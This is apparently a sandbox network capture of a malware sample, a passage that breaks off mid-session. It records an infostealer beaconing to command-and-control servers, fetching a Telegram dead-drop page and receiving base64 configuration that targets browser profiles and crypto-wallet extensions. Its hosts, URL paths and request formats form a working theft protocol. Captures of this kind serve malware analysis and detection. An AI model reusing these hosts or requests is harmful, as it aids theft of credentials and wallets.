                                                                                                                                                                                                                                                Dec 13, 2024 13:59:05.204950094 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:06.601958990 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:59:06 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                148192.168.2.450595185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:08.242635965 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:09.633733034 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:59:09 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                149192.168.2.450596185.215.113.4380
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:11.383420944 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:59:12.754947901 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:59:12 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                0192.168.2.449756149.154.167.994437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:14 UTC86OUTGET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                Host: t.me
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:15 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:15 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 12314
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: stel_ssid=4325bdd3d696776e18_8917033688022161950; expires=Sat, 14 Dec 2024 12:52:15 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                2024-12-13 12:52:15 UTC12314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                1192.168.2.449764116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:17 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:18 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                2192.168.2.449770116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:19 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----OPHDT2D26F37YM7GV3E3
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:19 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 37 38 34 45 46 46 34 43 41 34 32 39 33 36 30 35 30 34 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 50 48 44 54 32 44 32 36 46 33 37 59 4d 37 47 56 33 45 33 2d 2d 0d
                                                                                                                                                                                                                                                Data Ascii: ------OPHDT2D26F37YM7GV3E3Content-Disposition: form-data; name="hwid"DB784EFF4CA42936050476-a33c7340-61ca------OPHDT2D26F37YM7GV3E3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OPHDT2D26F37YM7GV3E3--
                                                                                                                                                                                                                                                2024-12-13 12:52:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:20 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|1994e880c5cede79258d376815680a06|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                3192.168.2.449776116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:22 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----4W4OPHD2DTRIM790ZMG4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:22 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 34 57 34 4f 50 48 44 32 44 54 52 49 4d 37 39 30 5a 4d 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 34 57 34 4f 50 48 44 32 44 54 52 49 4d 37 39 30 5a 4d 47 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 34 57 34 4f 50 48 44 32 44 54 52 49 4d 37 39 30 5a 4d 47 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------4W4OPHD2DTRIM790ZMG4Content-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------4W4OPHD2DTRIM790ZMG4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------4W4OPHD2DTRIM790ZMG4Cont
                                                                                                                                                                                                                                                2024-12-13 12:52:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:22 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:23 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                4192.168.2.449783116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:25 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----89000ZCJ5XBIEU37YU3W
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 39 30 30 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 38 39 30 30 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 38 39 30 30 30 5a 43 4a 35 58 42 49 45 55 33 37 59 55 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------89000ZCJ5XBIEU37YU3WContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------89000ZCJ5XBIEU37YU3WContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------89000ZCJ5XBIEU37YU3WCont
                                                                                                                                                                                                                                                2024-12-13 12:52:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:25 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.449795116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:27 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----U3WBSRQQ9RQQIECJWLNG
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:27 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 55 33 57 42 53 52 51 51 39 52 51 51 49 45 43 4a 57 4c 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 42 53 52 51 51 39 52 51 51 49 45 43 4a 57 4c 4e 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 33 57 42 53 52 51 51 39 52 51 51 49 45 43 4a 57 4c 4e 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------U3WBSRQQ9RQQIECJWLNGContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------U3WBSRQQ9RQQIECJWLNGContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------U3WBSRQQ9RQQIECJWLNGCont
                                                                                                                                                                                                                                                2024-12-13 12:52:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:28 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.449801116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:30 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CJW47YMGDTRQQIMO8YUS
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 5905
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:30 UTC5905OUTData Raw: 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 59 4d 47 44 54 52 51 51 49 4d 4f 38 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 59 4d 47 44 54 52 51 51 49 4d 4f 38 59 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 4a 57 34 37 59 4d 47 44 54 52 51 51 49 4d 4f 38 59 55 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------CJW47YMGDTRQQIMO8YUSContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------CJW47YMGDTRQQIMO8YUSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------CJW47YMGDTRQQIMO8YUSCont
                                                                                                                                                                                                                                                2024-12-13 12:52:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:52:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.449802116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:31 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CJW47YMGDTRQQIMO8YUS
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
